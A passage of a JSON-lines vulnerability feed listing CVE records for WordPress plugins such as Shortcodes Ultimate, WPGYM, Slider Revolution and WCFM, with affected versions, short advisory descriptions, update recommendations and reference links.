version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50a89ad1-a3d0-49e3-8d2e-4cb81ac115ba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50a89ad1-a3d0-49e3-8d2e-4cb81ac115ba?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/shortcodes\\\/button.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/shortcodes\\\/button.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3007660%40shortcodes-ultimate&new=3007660%40shortcodes-ultimate&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3007660%40shortcodes-ultimate&new=3007660%40shortcodes-ultimate&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1592","slug":"complianz-gdpr","versionImpact":"6.5.6","versionEndExcluding":"7.0.0","description":"The Complianz \u2013 GDPR\/CCPA Cookie Consent plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.5.6. This is due to missing or incorrect nonce validation on the process_delete function in class-DNSMPD.php. This makes it possible for unauthenticated attackers to delete GDPR data requests via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6b524fc5-4beb-49f6-bafa-c788c6d1d78c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6b524fc5-4beb-49f6-bafa-c788c6d1d78c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3041903%40complianz-gdpr&old=3009228%40complianz-gdpr&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3041903%40complianz-gdpr&old=3009228%40complianz-gdpr&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6226","slug":"shortcodes-ultimate","versionImpact":"5.13.3","versionEndExcluding":"7.0.0","description":"The WP Shortcodes Plugin \u2014 Shortcodes Ultimate plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 5.13.3 via the su_meta shortcode due to missing validation on the user controlled keys 'key' and 'post_id'. This makes it possible for authenticated attackers, with contributor-level access and above, to retrieve arbitrary post meta values which may contain sensitive information when combined with another plugin.","recommendation":"Update to version 7.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d936a48-b300-4a41-8d28-ba34cb3c5cb7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d936a48-b300-4a41-8d28-ba34cb3c5cb7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/shortcodes\\\/meta.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/shortcodes\\\/meta.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3000576%40shortcodes-ultimate&new=3000576%40shortcodes-ultimate&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3000576%40shortcodes-ultimate&new=3000576%40shortcodes-ultimate&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3050","slug":"site-reviews","versionImpact":"6.11.8","versionEndExcluding":"7.0.0","description":"The Site Reviews WordPress plugin before 7.0.0 retrieves client IP addresses from potentially untrusted headers, allowing an attacker to manipulate its value. This may be used to bypass IP-based blocking","recommendation":"Update to version 7.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/04c1581e-fd36-49d4-8463-b49915d4b1ac\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/04c1581e-fd36-49d4-8463-b49915d4b1ac\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6225","slug":"shortcodes-ultimate","versionEndExcluding":"7.0.0","description":"The WP Shortcodes Plugin \u2014 Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's su_meta shortcode combined with post meta data in all versions up to, and including, 5.13.3 due to insufficient input sanitization and output escaping on user supplied meta values. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/558e36f6-4678-46a2-8154-42770fbb5574?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/558e36f6-4678-46a2-8154-42770fbb5574?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/shortcodes\\\/meta.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/shortcodes\\\/meta.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3000576%40shortcodes-ultimate&new=3000576%40shortcodes-ultimate&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3000576%40shortcodes-ultimate&new=3000576%40shortcodes-ultimate&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1273","slug":"nd-shortcodes","versionEndExcluding":"7.0","description":"The ND Shortcodes WordPress plugin before 7.0 does not validate some shortcode attributes before using them to generate paths passed to include function\/s, allowing any authenticated users such as subscriber to perform LFI attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0805ed7e-395d-48de-b484-6c3ec1cd4b8e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0805ed7e-395d-48de-b484-6c3ec1cd4b8e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4623","slug":"nd-shortcodes","versionEndExcluding":"7.0","description":"The ND Shortcodes WordPress plugin before 7.0 does not validate and escape numerous of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1b3201da-f254-406f-9b4a-cd5025b6b03d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1b3201da-f254-406f-9b4a-cd5025b6b03d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-32692","slug":"chauffeur-booking-system","versionImpact":"6.9","versionEndExcluding":"7.0","description":"Missing Authorization vulnerability in QuanticaLabs Chauffeur Taxi Booking System for WordPress allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Chauffeur Taxi Booking System for WordPress: from n\/a through 6.9.","recommendation":"Update to version 7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/chauffeur-booking-system\\\/wordpress-chauffeur-taxi-booking-system-for-wordpress-plugin-6-9-broken-authentication-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/chauffeur-booking-system\\\/wordpress-chauffeur-taxi-booking-system-for-wordpress-plugin-6-9-broken-authentication-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7442","slug":"gym-management","versionEndExcluding":"67.8.0","description":"The WPGYM - Wordpress Gym Management System plugin for WordPress is vulnerable to SQL Injection via several parameters in the MJ_gmgt_delete_class_limit_for_member, MJ_gmgt_get_yearly_income_expense, MJ_gmgt_get_monthly_income_expense, MJ_gmgt_add_class_limit, MJ_gmgt_view_meeting_detail, and MJ_gmgt_create_meeting functions in all versions up to 67.8.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 67.8.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/-wpgym-wordpress-gym-management-system\\\/13352964?s_rank=2\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/-wpgym-wordpress-gym-management-system\\\/13352964?s_rank=2\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e52289fe-9a38-4ebf-b24a-034768fa56b7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e52289fe-9a38-4ebf-b24a-034768fa56b7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9942","slug":"gym-management","versionImpact":"67.1.0","versionEndExcluding":"67.2.0","description":"The WPGYM - Wordpress Gym Management System plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the MJ_gmgt_user_avatar_image_upload() function in all versions up to, and including, 67.1.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 67.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/-wpgym-wordpress-gym-management-system\\\/13352964\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/-wpgym-wordpress-gym-management-system\\\/13352964\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bae5f22d-5085-4230-a7fc-5db85aa6fbdb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bae5f22d-5085-4230-a7fc-5db85aa6fbdb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9941","slug":"gym-management","versionImpact":"67.1.0","versionEndExcluding":"67.2.0","description":"The WPGYM - Wordpress Gym Management System plugin for WordPress is vulnerable to privilege escalation due to a missing capability check on the MJ_gmgt_add_staff_member() function in all versions up to, and including, 67.1.0. This makes it possible for authenticated attackers, with subscriber-level access and above, to create new user accounts with the administrator role.","recommendation":"Update to version 67.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/-wpgym-wordpress-gym-management-system\\\/13352964\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/-wpgym-wordpress-gym-management-system\\\/13352964\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbff92c1-8492-4d0d-bd90-8fd33625bf6f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbff92c1-8492-4d0d-bd90-8fd33625bf6f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-3622","slug":"blog2social","versionImpact":"6.9.11","versionEndExcluding":"6.9.12","description":"The Blog2Social plugin for WordPress is vulnerable to authorization bypass due to missing capability checks in versions up to, and including, 6.9.11. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to change some plugin settings intended to be modifiable by admins only.","recommendation":"Update to version 6.9.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5b8d39c-d307-42c9-a972-29b5521a82a4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5b8d39c-d307-42c9-a972-29b5521a82a4?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blog2social\\\/tags\\\/6.9.10\\\/includes\\\/B2S\\\/Settings\\\/Item.php#L116\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blog2social\\\/tags\\\/6.9.10\\\/includes\\\/B2S\\\/Settings\\\/Item.php#L116\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2795052%40blog2social&new=2795052%40blog2social&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2795052%40blog2social&new=2795052%40blog2social&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2796598%40blog2social&new=2796598%40blog2social&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2796598%40blog2social&new=2796598%40blog2social&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12118","slug":"the-events-calendar","versionImpact":"6.9.0","versionEndExcluding":"6.9.1","description":"The The Events Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Event Calendar Link Widget through the html_tag attribute in all versions up to, and including, 6.9.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-events-calendar\\\/tags\\\/6.8.1\\\/src\\\/Events\\\/Integrations\\\/Plugins\\\/Elementor\\\/Widgets\\\/Event_Calendar_Link.php#L90\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-events-calendar\\\/tags\\\/6.8.1\\\/src\\\/Events\\\/Integrations\\\/Plugins\\\/Elementor\\\/Widgets\\\/Event_Calendar_Link.php#L90\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3227009\\\/the-events-calendar\\\/tags\\\/6.9.1\\\/src\\\/views\\\/integrations\\\/elementor\\\/widgets\\\/event-calendar-link.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3227009\\\/the-events-calendar\\\/tags\\\/6.9.1\\\/src\\\/views\\\/integrations\\\/elementor\\\/widgets\\\/event-calendar-link.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d67de4f2-b680-49f8-be95-c2464b70f7d0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d67de4f2-b680-49f8-be95-c2464b70f7d0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0600","slug":"wp-stats-manager","versionEndExcluding":"6.9","description":"The WP Visitor Statistics (Real Time Traffic) WordPress plugin before 6.9 does not escape user input which is concatenated to an SQL query, allowing unauthenticated visitors to conduct SQL Injection attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8f46df4d-cb80-4d66-846f-85faf2ea0ec4\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8f46df4d-cb80-4d66-846f-85faf2ea0ec4\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2518","slug":"yikes-inc-easy-mailchimp-extender","versionEndExcluding":"6.8.8","description":"The Easy Forms for Mailchimp WordPress plugin through 6.8.8 does not sanitise and escape a parameter before outputting it back in the page when the debug option is enabled, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca120255-2c50-4906-97f3-ea660486db4c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca120255-2c50-4906-97f3-ea660486db4c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1324","slug":"yikes-inc-easy-mailchimp-extender","versionEndExcluding":"6.8.8","description":"The Easy Forms for Mailchimp WordPress plugin before 6.8.8 does not sanitise and escape some parameters before outputting them back in the response, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8f510b8c-b97a-44c9-a36d-2d775a4f7b81\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8f510b8c-b97a-44c9-a36d-2d775a4f7b81\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1799","slug":"gamipress","versionImpact":"6.8.6","versionEndExcluding":"6.8.7","description":"The GamiPress \u2013 The #1 gamification plugin to reward points, achievements, badges & ranks in WordPress plugin for WordPress is vulnerable to SQL Injection via the 'achievement_types' attribute of the gamipress_earnings shortcode in all versions up to, and including, 6.8.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 6.8.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f357fe2a-aa24-42cd-ac2c-c948e18a4710?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f357fe2a-aa24-42cd-ac2c-c948e18a4710?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3051688%40gamipress&new=3051688%40gamipress&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3051688%40gamipress&new=3051688%40gamipress&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1325","slug":"yikes-inc-easy-mailchimp-extender","versionEndExcluding":"6.8.7","description":"The Easy Forms for Mailchimp WordPress plugin before 6.8.7 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5f37cbf3-2388-4582-876c-6a7b0943c2a7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5f37cbf3-2388-4582-876c-6a7b0943c2a7\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5333","slug":"the-events-calendar","versionImpact":"6.8.2","versionEndExcluding":"6.8.2.1","description":"The Events Calendar WordPress plugin before 6.8.2.1 is missing access checks in the REST API, allowing for unauthenticated users to access information about password protected events.","recommendation":"Update to version 6.8.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/764b5a23-8b51-4882-b899-beb54f684984\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/764b5a23-8b51-4882-b899-beb54f684984\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1725","slug":"file-manager","versionImpact":"6.7","versionEndExcluding":"6.8","description":"The Bit File Manager \u2013 100% Free & Open Source File Manager and Code Editor for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 6.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","recommendation":"Update to version 6.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager\\\/tags\\\/6.6.3\\\/backend\\\/app\\\/Http\\\/Controllers\\\/FileManagerController.php#L112\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager\\\/tags\\\/6.6.3\\\/backend\\\/app\\\/Http\\\/Controllers\\\/FileManagerController.php#L112\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84ddb481-f989-4ba8-9925-e8327c30de38?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84ddb481-f989-4ba8-9925-e8327c30de38?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0660","slug":"formidable","versionImpact":"6.7.2","versionEndExcluding":"6.8","description":"The Formidable Forms \u2013 Contact Form, Survey, Quiz, Payment, Calculator Form & Custom Form Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.7.2. This is due to missing or incorrect nonce validation on the update_settings function. This makes it possible for unauthenticated attackers to change form settings and add malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 6.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b983d22b-6cd2-4450-99e2-88bb149091fe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b983d22b-6cd2-4450-99e2-88bb149091fe?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3026901\\\/formidable\\\/tags\\\/6.8\\\/classes\\\/controllers\\\/FrmFormsController.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3026901\\\/formidable\\\/tags\\\/6.8\\\/classes\\\/controllers\\\/FrmFormsController.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4092","slug":"revslider","versionImpact":"6.7.7","versionEndExcluding":"6.7.8","description":"The Slider Revolution plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018htmltag\u2019 parameter in all versions up to, and including, 6.7.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. By default, this can only be exploited by administrators, but the ability to use and configure Slider Revolution can be extended to authors.","recommendation":"Update to version 6.7.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8437abcc-3e34-4a8a-bfe2-2ff7c9f41164?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8437abcc-3e34-4a8a-bfe2-2ff7c9f41164?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.sliderrevolution.com\\\/documentation\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/www.sliderrevolution.com\\\/documentation\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8107","slug":"revslider","versionImpact":"6.7.18","versionEndExcluding":"6.7.19","description":"The Slider Revolution plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 6.7.18 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. By default, this can only be exploited by administrators, but the ability to use and configure Slider Revolution can be extended to authors.","recommendation":"Update to version 6.7.19, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22b59b36-ba47-4c10-8f43-a29ae3b9d446?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22b59b36-ba47-4c10-8f43-a29ae3b9d446?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.sliderrevolution.com\\\/documentation\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/www.sliderrevolution.com\\\/documentation\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.sliderrevolution.com\\\/documentation\\\/changelog\\\/#6-7-19\",\"name\":\"https:\\\/\\\/www.sliderrevolution.com\\\/documentation\\\/changelog\\\/#6-7-19\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3780","slug":"wc-frontend-manager","versionImpact":"6.7.16","versionEndExcluding":"6.7.17","description":"The WCFM \u2013 Frontend Manager for WooCommerce along with Bookings Subscription Listings Compatible plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the wcfm_redirect_to_setup function in all versions up to, and including, 6.7.16. This makes it possible for unauthenticated attackers to view and modify the plugin settings, including payment details and API keys.","recommendation":"Update to version 6.7.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-frontend-manager\\\/tags\\\/6.7.16\\\/core\\\/class-wcfm-admin.php#L74\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-frontend-manager\\\/tags\\\/6.7.16\\\/core\\\/class-wcfm-admin.php#L74\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-frontend-manager\\\/tags\\\/6.7.16\\\/core\\\/class-wcfm-admin.php#L81\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-frontend-manager\\\/tags\\\/6.7.16\\\/core\\\/class-wcfm-admin.php#L81\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26a82493-a6a5-4d8e-8322-942925a54cc3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26a82493-a6a5-4d8e-8322-942925a54cc3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8290","slug":"wc-frontend-manager","versionImpact":"6.7.12","versionEndExcluding":"6.7.13","description":"The WCFM \u2013 Frontend Manager for WooCommerce along with Bookings Subscription Listings Compatible plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 6.7.12 via the WCFM_Customers_Manage_Controller::processing function due to missing validation on the ID user controlled key. This makes it possible for authenticated attackers, with subscriber\/customer-level access and above, to change the email address of administrator user accounts which allows them to reset the password and access the administrator account.","recommendation":"Update to version 6.7.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79172fe3-c0cf-48c4-8bc5-862c628c1a09?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79172fe3-c0cf-48c4-8bc5-862c628c1a09?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-frontend-manager\\\/tags\\\/6.7.12\\\/controllers\\\/customers\\\/wcfm-controller-customers-manage.php#L97\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-frontend-manager\\\/tags\\\/6.7.12\\\/controllers\\\/customers\\\/wcfm-controller-customers-manage.php#L97\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156433\\\/wc-frontend-manager\\\/trunk\\\/controllers\\\/customers\\\/wcfm-controller-customers-manage.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156433\\\/wc-frontend-manager\\\/trunk\\\/controllers\\\/customers\\\/wcfm-controller-customers-manage.php\",\"refsource\":\"\",\"tags\":[]}]"}
